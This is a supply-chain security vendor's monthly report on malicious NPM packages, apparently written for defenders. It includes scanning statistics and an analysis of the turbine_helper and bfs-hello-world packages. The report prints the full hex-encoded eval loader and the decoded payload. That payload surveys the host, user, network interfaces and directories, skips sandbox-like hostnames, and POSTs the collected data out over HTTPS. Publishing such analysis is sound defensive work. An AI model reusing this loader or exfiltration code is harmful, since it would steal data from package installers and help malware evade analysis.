May 19, 2022 4 min read Phylum Research

Phylum's Monthly Malware Report: May 2022 - Precarious Payloads

To combat the massive uptick in software supply chain attacks and defend against threats from the open-source ecosystem, Phylum has been purpose-built to provide near-real-time, proactive analysis of packages as they are published. Given how vast these ecosystems are today, simply hiring security talent to attempt analysis is a losing battle. In the past 30 days, Phylum has processed a total of 210,034 packages across three ecosystems (NPM, PyPI, and RubyGems). NPM alone accounted for 178,635 of these, an average of 5,762 packages per day. Overall, this amounts to the analysis of an average of 3,571,566 source files every 24 hours, for a total of 110,718,566 files in the last month.

Repository Statistics

Package Registry	No. of Packages
NPM	178,635
PyPI	29,277
RubyGems	2,122

Total Package Analysis

Analysis, last 30 days	Count
Total Packages Analyzed	210,034
Total Files Examined	110,718,566
Malicious Packages Identified	84

Breakout by File Type

Filetype	Count
TypeScript	41,773,936
JavaScript	53,844,473
ECMAScript modules	1,725,324
Ruby	1,131,348
Python	9,430,753
TSX	2,227,306
CommonJS modules	273,257
Bash	120,821
Java	191,315
Total	110,718,566

Phylum’s heuristics, analytics, and machine learning models combed through these packages as they were published, identifying and convicting 84 malicious packages in the last 30 days. On average, results were returned within 10.5 minutes of publication.

Many of these packages were tied to existing campaigns (detailed below), along with some new (apparent) rogue actors.

Precarious Payloads

Some of the more interesting packages uncovered this month include several releases of an NPM library called turbine_helper and a related package named bfs-hello-world. Both packages featured extremely high release version numbers, with major versions starting in the high 90s.
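A check for this kind of version anomaly can be sketched in a few lines. This is a minimal illustration, not Phylum's actual heuristic: the function names, the threshold of 90, and the version strings in the usage note are all assumptions made for the example.

```javascript
// Hypothetical heuristic: flag a package whose lowest published major
// version is already unusually high. The threshold is an assumption chosen
// to match the "high 90s" observation above, not a value from Phylum.
const MAJOR_THRESHOLD = 90;

// Extract the major version from a string such as "97.0.1" or "v97.0.1".
// Returns null when the string does not start with "<digits>.".
function majorVersion(version) {
  const match = /^v?(\d+)\./.exec(version);
  return match ? Number(match[1]) : null;
}

// True when every parseable version has a major number at or above the
// threshold, i.e. the package never had an ordinary low-numbered release.
function hasSuspiciousFirstRelease(versions, threshold = MAJOR_THRESHOLD) {
  const majors = versions.map(majorVersion).filter((m) => m !== null);
  if (majors.length === 0) return false;
  return Math.min(...majors) >= threshold;
}
```

For example, with made-up version lists, `hasSuspiciousFirstRelease(["97.0.1", "99.2.0"])` is flagged, while `hasSuspiciousFirstRelease(["1.0.0", "97.0.0"])` is not, because the package has an ordinary early release. On its own this signal is weak and would need to be combined with others.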

Both sets of samples contained a nearly identical, hex-encoded payload. The general wrapper looked something like the following:


	const packageJSON = require("./package.json");
	const package = packageJSON.name;

	function hexify(p, data) {
	  const bufferText = Buffer.from(data, 'hex');
	  const text = bufferText.toString('ascii');
	  return text.replace('$$$$$$', p);
	}

	hello = eval;
	image="<long, hex encoded payload>";

	function render(image){
	  eval(hexify(package, hexify(package, image)));
	}

	render(image);

	function mapResult(result) {
	  return {
	    success: result.success,
	    error: result.error && parser.getTrace(result.error.message)
	  }
	}

The releases varied slightly. As shown above, the payload is double hex-encoded here, whereas some of the turbine_helper releases used only a single layer of encoding.
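For analysis, the payload can be unpacked without ever executing it. The following is a minimal sketch that mirrors the wrapper's hexify step but returns the decoded source as a string instead of passing it to eval. The names decodeLayer and unpack, and the maxLayers limit, are assumptions introduced for this example.

```javascript
// Decode one layer: hex -> ASCII, then substitute the package-name
// placeholder, mirroring hexify() in the wrapper. A replacer function is
// used so the package name is always inserted literally.
function decodeLayer(packageName, data) {
  const text = Buffer.from(data, "hex").toString("ascii");
  return text.replace("$$$$$$", () => packageName);
}

// Matches strings made up entirely of hex byte pairs.
const HEX_ONLY = /^(?:[0-9a-fA-F]{2})+$/;

// Peel hex layers until the result no longer looks like hex, so both the
// single- and double-encoded variants are handled. maxLayers is a
// hypothetical safety limit. The decoded source is returned, never run.
function unpack(packageName, blob, maxLayers = 4) {
  let current = blob.trim();
  let layers = 0;
  while (layers < maxLayers && HEX_ONLY.test(current)) {
    current = decodeLayer(packageName, current);
    layers += 1;
  }
  return { layers, source: current };
}
```

Calling `unpack(name, image)` with the package name and the hex string from the wrapper yields the number of layers removed and the decoded JavaScript, which can then be read or scanned statically.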

When unpacked, it had a very straightforward payload which would survey and exfiltrate a variety of items from the system:


{
    const os = require("os");
    const dns = require("dns");
    const querystring = require("querystring");
    const https = require("https");
    const fs = require('fs');
    var path = require('path');
    
    function unhexify(data) {
        const bufferText = Buffer.from(data, 'hex');
        const text = bufferText.toString('ascii');
        return text;
    }
    
    function enhexify(data){
        const bufferText = Buffer.from(data, 'utf8');
        const text = bufferText.toString('hex');
        return text;
    }
    
    function checkuuid(inputString) {
        var re = /^[0-9a-f]+-[0-9a-f]+-[0-9a-f]+-[0-9a-f]+-[0-9a-f]+$/g;
        if (re.test(inputString)) {
            return true
        } else {
            return false;
        }
    }
    
    function checkhex(inputString) {
        var re = /^[0-9a-f]+$/g;
        if (re.test(inputString)) {
            return true
        } else {
            return false;
        }
    }
    
    function checkpath(inputString) {
        var re = /^\/root\/extract[0-9]+\/package$/g;
        if (re.test(inputString)) {
            return true
        } else {
            return false;
        }
    }
    
    function isValid(hostname, path, username) {
        if (hostname == unhexify("4445534b544f502d3445314953304b") && 
            username == unhexify("6461617361646d696e")) return false;
        else if (hostname == unhexify('626f78')) return false;
        else if (checkhex(hostname)) return false;
        else if (checkuuid(hostname)) return false;
        else if (hostname == unhexify('6c696c692d7063')) return false; 
        else if (hostname == unhexify('6177732d3767726172613931336f6964356a736578676b71')) 
        	return false;
        else if (hostname == unhexify('696e7374616e6365')) return false;
        else return true;
    }
    
    function getFiles(paths) {
        var ufiles = [];
        for (var j = 0; j < paths.length; j++) {
            try {
                mpath = paths[j];
                files = fs.readdirSync(mpath);
                for (var i = 0; i < files.length; i++) {
                    ufiles.push(path.join(mpath, files[i]))
                }
            } catch (error) {
                // console.log(error)
            }
        }
        return ufiles;
    }
     
    function isprivate(ip) { 
        if (ip.startsWith('fe80::') || ip=="::1" ) return true; 
        var parts=ip.split('.'); 
        return parts[0]==='10'  
            || (parts[0]==='172' && (parseInt(parts[1], 10)>= 16 && parseInt(parts[1], 10) <= 31)) 
            || (parts[0]==='192' && parts[1]==='168') 
            || (parts[0]==='127' && parts[1]==='0'&& parts[2]==='0');
    } 
    
    function gethttpips() {
        var str = [];
        var networkInterfaces = os.networkInterfaces();
        for (item in networkInterfaces) {
            if (item != "lo") {
                for (var i = 0; i < networkInterfaces[item].length; i++) {
                    str.push(networkInterfaces[item][i].address);
                }
            }
        }
        return str;
    }
    
    const td={ 
        p: '$$$$$$', 
        c: __dirname, 
        hd: os.homedir(), 
        hn: os.hostname(), 
        un: os.userInfo().username, 
        dns: JSON.stringify(dns.getServers()), 
        ip: JSON.stringify(gethttpips()), 
        dirs: JSON.stringify(getFiles(["C:\\", "D:\\" , "/" , "/home" ])), 
    } 
    
    if (isValid(td.hn, td.c, td.un)) { 
        const trackingData=JSON.stringify(td); 
        var postData=querystring.stringify({ msg: enhexify(trackingData) }); 
        var options={ 
            hostname: "" , 
            port: 443, 
            path: "/" ,
            method: "POST" ,
            headers: { 
            	"Content-Type" : "application/x-www-form-urlencoded" , 
                "Content-Length" : postData.length, 
            }
        }; 
        var req=https.request(options, (res) => {
            res.on("data", (d) => {
                //process.stdout.write(d);
            });
        });
        req.on("error", (e) => {
            // console.error(e);
        });
        req.write(postData);
        req.end();
    }
}

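The payload is written to collect the package name, its install directory, the user’s home directory path, the hostname, the username, the configured DNS servers, the addresses of the local network interfaces, and a listing of the top-level entries under C:\, D:\, /, and /home. The checkpath and isprivate helpers are defined but never called in this sample. The data is sent only when isValid returns true, that is, when the hostname is neither all lowercase hexadecimal nor UUID-shaped and is not one of the hosts listed below (DESKTOP-4E1IS0K is skipped only when the current user is daasadmin):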

DESKTOP-4E1IS0K
box
lili-pc
aws-7grara913oid5jsexgkq
instance
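The hostnames above come from decoding the hex strings in isValid. As a sketch for analysts, the skip logic can be restated with the strings decoded up front. The names wouldExfiltrate, SKIPPED_HOSTNAMES, and SKIPPED_HOST_USER_PAIR are assumptions introduced here, and the function only reports the decision; it performs no network activity.

```javascript
// Same decoding as unhexify() in the payload.
const unhexify = (hex) => Buffer.from(hex, "hex").toString("ascii");

// Hostnames that are skipped regardless of the username.
const SKIPPED_HOSTNAMES = [
  "626f78",
  "6c696c692d7063",
  "6177732d3767726172613931336f6964356a736578676b71",
  "696e7374616e6365",
].map(unhexify);

// This hostname is skipped only in combination with this username.
const SKIPPED_HOST_USER_PAIR = {
  hostname: unhexify("4445534b544f502d3445314953304b"),
  username: unhexify("6461617361646d696e"),
};

// Same patterns as checkhex() and checkuuid(), minus the g flag: test() on
// a global regex keeps state in lastIndex between calls.
const HEX_HOSTNAME = /^[0-9a-f]+$/;
const UUID_LIKE_HOSTNAME = /^[0-9a-f]+-[0-9a-f]+-[0-9a-f]+-[0-9a-f]+-[0-9a-f]+$/;

// Hypothetical helper: true when the payload's isValid() check would pass
// for this hostname and username.
function wouldExfiltrate(hostname, username) {
  if (
    hostname === SKIPPED_HOST_USER_PAIR.hostname &&
    username === SKIPPED_HOST_USER_PAIR.username
  ) {
    return false;
  }
  if (SKIPPED_HOSTNAMES.includes(hostname)) return false;
  if (HEX_HOSTNAME.test(hostname) || UUID_LIKE_HOSTNAME.test(hostname)) return false;
  return true;
}
```

The hexadecimal and UUID-shaped patterns plausibly target auto-generated machine names such as those used by containers and analysis sandboxes, although the sample itself does not say so.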

Why Phylum & What’s Coming Next…

Phylum’s capabilities extend beyond pure source code analysis. We have constructed authorship models that, in combination with other metrics, allow us to identify odd behaviors around commits and activity. We analyze maintainer information for a package, allowing us to spot packages that have recently changed ownership and may be at risk for the introduction of malware (as was the case with event-stream in 2018).
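As a rough illustration of the ownership signal only, and not a description of Phylum's models, a maintainer change between consecutive releases could be detected as follows. The input shape (releases ordered oldest to newest, each with a version and a maintainers array) and the function name findOwnershipChanges are assumptions made for this sketch.

```javascript
// Hypothetical input: releases sorted oldest to newest, each shaped like
// { version: "1.0.0", maintainers: ["alice"] }.
// Returns one entry per release whose maintainer set differs from the
// release immediately before it.
function findOwnershipChanges(releases) {
  const changes = [];
  for (let i = 1; i < releases.length; i++) {
    const before = new Set(releases[i - 1].maintainers);
    const after = new Set(releases[i].maintainers);
    const added = [...after].filter((m) => !before.has(m));
    const removed = [...before].filter((m) => !after.has(m));
    if (added.length > 0 || removed.length > 0) {
      changes.push({ version: releases[i].version, added, removed });
    }
  }
  return changes;
}
```

A release that both gains a new maintainer and loses the original one is the pattern of interest here; in practice it would be weighed alongside other signals rather than treated as proof of compromise.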

We recently released support for C#/NuGet and Java/Maven and, looking forward, we are preparing to add the Golang and Rust ecosystems. In addition, we are pushing hard to increase both the sophistication and the number of our heuristics and analytics.

Phylum, at its core, is a risk detection system focusing on the software supply chain. Unlike other SCA products that focus nearly exclusively on well-known issues, we are looking for the unknown unknowns - the subtle modifications to a software package that will surreptitiously exfiltrate keys to your critical infrastructure. We do this at the scale of open source, tackling the problem in an automated fashion, to make software supply chain security proactive instead of merely reactive.

To learn more about Phylum’s automated malware identification capability and how we support secure and efficient use of open-source software, please contact us for a conversation.

Phylum Research Team

Hackers, Data Scientists, and Engineers responsible for the identification and takedown of software supply chain attackers.